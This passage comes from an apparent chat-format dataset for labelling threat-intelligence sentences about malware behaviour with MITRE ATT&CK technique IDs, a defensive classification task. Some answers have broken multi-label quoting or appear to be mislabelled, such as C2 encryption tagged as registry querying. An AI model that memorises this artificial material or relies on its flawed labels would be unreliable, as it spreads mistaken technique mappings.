- "content": "Hi-Zor uses various XOR techniques to obfuscate its components."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can create a directory (C:\\ProgramData\\Mail\\MailAg\\gl) to use as a temporary directory for uploading files."
- },
- {
- "role": "assistant",
- "content": "T1074 - Data Staged"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Flagpro has been distributed via spearphishing as an email attachment."
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Astaroth executes embedded JScript or VBScript in an XSL stylesheet located on a remote domain."
- },
- {
- "role": "assistant",
- "content": "T1220 - XSL Script Processing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Flagpro can close specific Windows Security and Internet Explorer dialog boxes to mask external connections."
- },
- {
- "role": "assistant",
- "content": "T1070 - Indicator Removal on Host"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "UNC2452 collected emails from specific individuals, such as executives and IT staff, using \"New-MailboxExportRequest\" followed by \"Get-MailboxExportRequest\"."
- },
- {
- "role": "assistant",
- "content": "T1114.002 - Email Collection: Remote Email Collection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The loadconfig and state commands are executed during initialization, effectively creating the configuration file if it does not exist and writing the state command to it"
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dacls can establish persistence via a Launch Daemon."
- },
- {
- "role": "assistant",
- "content": "T1543.004 - Create or Modify System Process: Launch Daemon"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Moreover, USBWorm uses an icon that mimics a Windows directory, tricking the user into executing the malware when trying to access a directory"
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "QakBot has the ability to check running processes."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bazar can inject into a target process using process doppelgänging."
- },
- {
- "role": "assistant",
- "content": "T1055.013 - Process Doppelgänging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The command in Figure 8 downloads and launches code within an SCT file. The SCT file in the payload (MD5: 1554d6fe12830ae57284b389a1132d65) contained the code shown in Figure 9"
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During the first C&C call, the backdoor sends a pack with the victim’s system information. All further information sent to the C&C is encrypted with a public key framework, making decryption impossible. The commands from the C&C are encrypted in a simpler manner and can be decrypted if intercepted because the secret key is hardcoded in the malware"
- },
- {
- "role": "assistant",
- "content": "T1012 - Query Registry', 'T1560 - Archive Collected Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In this intrusion from December 2021, the threat actors utilized IcedID as the initial access vector. IcedID is a banking trojan that first appeared in 2017, usually, it is delivered via malspam campaigns and has been widely used as an initial access vector in multiple ransomware intrusions. Upon execution of… ."
- },
- {
- "role": "assistant",
- "content": "T1219 - Remote Access Software"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Pillowmint is usually installed through a malicious shim database which allows the malware to persist in the system"
- },
- {
- "role": "assistant",
- "content": "T1546.011 - Event Triggered Execution: Application Shimming"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TeamTNT has created system services to execute cryptocurrency mining software."
- },
- {
- "role": "assistant",
- "content": "T1569 - System Services"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "GreyEnergy encrypts communications using AES256."
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TA459 has attempted to get victims to open malicious Microsoft Word attachment sent via spearphishing."
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PingPull variants have the ability to communicate with C2 servers using ICMP or TCP."
- },
- {
- "role": "assistant",
- "content": "T1095 - Non-Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "H1N1 has self-propagation/lateral movement functionality (which requires user interaction) via mapped/available network shares or mounted USB devices"
- },
- {
- "role": "assistant",
- "content": "T1080 - Taint Shared Content"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ComRAT has used a scheduled task to launch its PowerShell loader."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CORESHELL collects hostname, volume serial number and OS version data from the victim and sends the information to its C2 server."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SoreFang can decode and decrypt exfiltrated data sent to C2."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Scheduled tasks enable administrators to run tasks or “jobs” at designated times rather than every time the system is booted or the user logs in. This feature can be implemented via the Windows COM API, which the first versions of Ramsay have tailored. Based on the high ratio of similarity with Carberp’s implementation, it’s highly probable that Ramsay’s implementation was adapted from Carberp’s publicly available source code"
- },
- {
- "role": "assistant",
- "content": "T1559.001 - Component Object Model', 'T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BBSRAT has been loaded through DLL side-loading of a legitimate Citrix executable that is set to persist through the Registry Run key location \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\ssonsvr.exe\"."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The adversaries modify publicly available tools such as ASPXSpy to remove identifying characteristics that network defenders use to identify web shells"
- },
- {
- "role": "assistant",
- "content": "T1505.003 - Server Software Component: Web Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Operation CuckooBees, the threat actors used the Makecab utility to compress and a version of WinRAR to create password-protected archives of stolen data prior to exfiltration."
- },
- {
- "role": "assistant",
- "content": "T1560.001 - Archive Collected Data: Archive via Utility"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used Technet and Pastebin web pages for command and control."
- },
- {
- "role": "assistant",
- "content": "T1102 - Web Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Mongall can use HTTP for C2 communication."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ZxShell can set up an HTTP or SOCKS proxy."
- },
- {
- "role": "assistant",
- "content": "T1090 - Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has been packed with the UPX packer."
- },
- {
- "role": "assistant",
- "content": "T1027.002 - Obfuscated Files or Information: Software Packing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The payload of is encrypted with simple XOR with a rotating key. The configuration file has been encrypted with RC4 keys."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sykipot has been known to establish persistence by adding programs to the Run Registry key."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A variant of ADVSTORESHELL encrypts some C2 with 3DES."
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "To run persistently on the system, the Trojan will first create a VBScript file:SpecialFolder.CommonApplicationData\\srvResesponded.vbs that contains:CreateObject(“WScript.Shell”).Run(“%app%”) The Trojan replaces the %app% string in the above VBScript with the path to its executable"
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter', 'T1064 - Scripting"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The backdoor determines its C2 server using a Domain Generation Algorithm (DGA) to construct and resolve a subdomain of avsvmcloud[.]com. The Update method is responsible for initializing cryptographic helpers for the generation of these random C2 subdomains. Subdomains are generated by concatenating a victim userId with a reversible encoding of the victims local machine domain name. The attacker likely utilizes the DGA subdomain to vary the DNS response to victims as a means to control the targeting of the malware. These subdomains are concatenated with one of the following to create the hostname to resolve"
- },
- {
- "role": "assistant",
- "content": "T1568 - Dynamic Resolution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has the capability to capture audio from a victim machine."
- },
- {
- "role": "assistant",
- "content": "T1123 - Audio Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "created a shortcut in the Windows startup folder to launch a PowerShell script each time the user logs in to establish persistence."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ObliqueRAT has the ability to extract data from removable devices connected to the endpoint."
- },
- {
- "role": "assistant",
- "content": "T1025 - Data from Removable Media"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Once initiated the agent proceeds to enumerate the infected machine using Windows Management Instrumentation (WMI) to obtain the following information"
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Calisto collects Keychain storage data and copies those passwords/tokens to a file."
- },
- {
- "role": "assistant",
- "content": "T1555.001 - Credentials from Password Stores: Keychain"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Drovorub can download files to a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Mongall can use Base64 to encode information sent to its C2."
- },
- {
- "role": "assistant",
- "content": "T1132.001 - Data Encoding: Standard Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CHOPSTICK is capable of performing keylogging."
- },
- {
- "role": "assistant",
- "content": "T1056.001 - Input Capture: Keylogging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "EVILNUM can run a remote scriptlet that drops a file and executes it via regsvr32.exe."
- },
- {
- "role": "assistant",
- "content": "T1218.010 - Signed Binary Proxy Execution: Regsvr32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "is capable of stealing Outlook passwords."
- },
- {
- "role": "assistant",
- "content": "T1003 - OS Credential Dumping"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Open interactive python shells with auto-completion on the all-in-memory remote python interpreter"
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The response to this request is hidden in the source code of following Flickr lookalike page"
- },
- {
- "role": "assistant",
- "content": "T1001 - Data Obfuscation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bankshot binds and listens on port 1058 for HTTP traffic while also utilizing a FakeTLS method."
- },
- {
- "role": "assistant",
- "content": "T1571 - Non-Standard Port"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OutSteel has used HTTP for C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DanaBot is a modular malware that includes various additional modules; the most popular functionalities of these modules are stealing information from compromised machines and injecting fake forms into popular ecommerce and social media sites to collect payment data. It can also provide full access to infected systems with remote desktop, or mouse and keyboard access by utilizing a VNC plugin."
- },
- {
- "role": "assistant",
- "content": "T1021.005 - Remote Services:VNC', 'T1592 - Gather Victim Host Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "If the bot is running with admin privileges on a Windows version newer than Windows 7, persistence is established using the registry “image file execution options” method"
- },
- {
- "role": "assistant",
- "content": "T1546.012 - Event Triggered Execution: Image File Execution Options Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ursnif droppers have used WMI classes to execute PowerShell commands."
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "spear phishing campaigns have included malicious Word documents with DDE execution."
- },
- {
- "role": "assistant",
- "content": "T1559.002 - Inter-Process Communication: Dynamic Data Exchange"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Deep Discovery Inspector protects customers from these threats via this DDI Rule: DDI Rule 18 : DNS response of a queried malware Command and Control domain DDI Rule 15 : Many unsuccessful logon attempts (nbt_scan.exe) DDI Rule 38 : Multiple unsuccessful logon attempts (nbt_scan.exe) TippingPoint customers are protected from these threats via these ThreatDV filters: 27218: HTTP: TROJ_RATANKBA_A Checkin 28219: HTTP: TROJ_RATANKBA_A Checkin 02 27220: HTTPS: TROJ_RATANKBA_A Checkin 27221: HTTP: Sundown EK Flash Exploit (SWF_EXPLOYT.YYRQ) A list of related Indicators of Compromise (IoCs) can be found in this appendix"
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "gh0st RAT can download files to the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can identify system information, including battery status."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This differs from the previous OopsIE variant that used a hardcoded task name for the scheduled task"
- },
- {
- "role": "assistant",
- "content": "T1053 - Scheduled Task/Job', 'T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The kill_unwanted function gets a list of running processes, compares each process with a encrypted list of “unwanted” programs. With our aforementioned breakpoint on the ei_str function, we can dump the decrypted strings, to ascertain the value of the “unwanted” programs"
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery', 'T1562.001 - Impair Defenses: Disable or Modify Tools', 'T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Chaes has used a script that extracts the web session cookie and sends it to the C2 server."
- },
- {
- "role": "assistant",
- "content": "T1539 - Steal Web Session Cookie"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Pasam creates a backdoor through which remote attackers can retrieve lists of files."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Wizard Spider has used RDP for lateral movement."
- },
- {
- "role": "assistant",
- "content": "T1021.001 - Remote Services: Remote Desktop Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kinsing has created and run a Bitcoin cryptocurrency miner."
- },
- {
- "role": "assistant",
- "content": "T1496 - Resource Hijacking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Pupy can list local and remote shared drives and folders over SMB."
- },
- {
- "role": "assistant",
- "content": "T1135 - Network Share Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PowGoop can side-load `Goopdate.dll` into `GoogleUpdate.exe`."
- },
- {
- "role": "assistant",
- "content": "T1574.002 - Hijack Execution Flow: DLL Side-Loading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The Iranian government-sponsored APT actors gained initial access by exploiting vulnerabilities affecting Microsoft Exchange servers (CVE-2021-34473) and Fortinet devices (CVE-2018-13379, CVE-2020-12812, and CVE-2019-5591)"
- },
- {
- "role": "assistant",
- "content": "T1190 - Exploit Public-Facing Application"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Trickbot is the most common malware distributed by Emotet, but it is not the only one. Qakbot is another type of malware frequently dropped on Emotet-infected Windows hosts."
- },
- {
- "role": "assistant",
- "content": "T1588.001 - Malware"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Chinese state-sponsored cyber actors have been observed gaining access to victim networks through watering hole campaigns of typo-squatted domains."
- },
- {
- "role": "assistant",
- "content": "T1189 - Drive-by Compromise"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "USBStealer exfiltrates collected files via removable media from air-gapped victims."
- },
- {
- "role": "assistant",
- "content": "T1052.001 - Exfiltration over USB"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Crimson contains a command to collect the victim PC name, disk drive information, and operating system."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "creates run key Registry entries pointing to malicious DLLs dropped to disk."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Silence has downloaded additional modules and malware to victim’s machines."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "attempts to add a shortcut file in the Startup folder to achieve persistence. If this fails, it attempts to add Registry Run keys."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dok is packed with an UPX executable packer."
- },
- {
- "role": "assistant",
- "content": "T1027.002 - Obfuscated Files or Information: Software Packing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
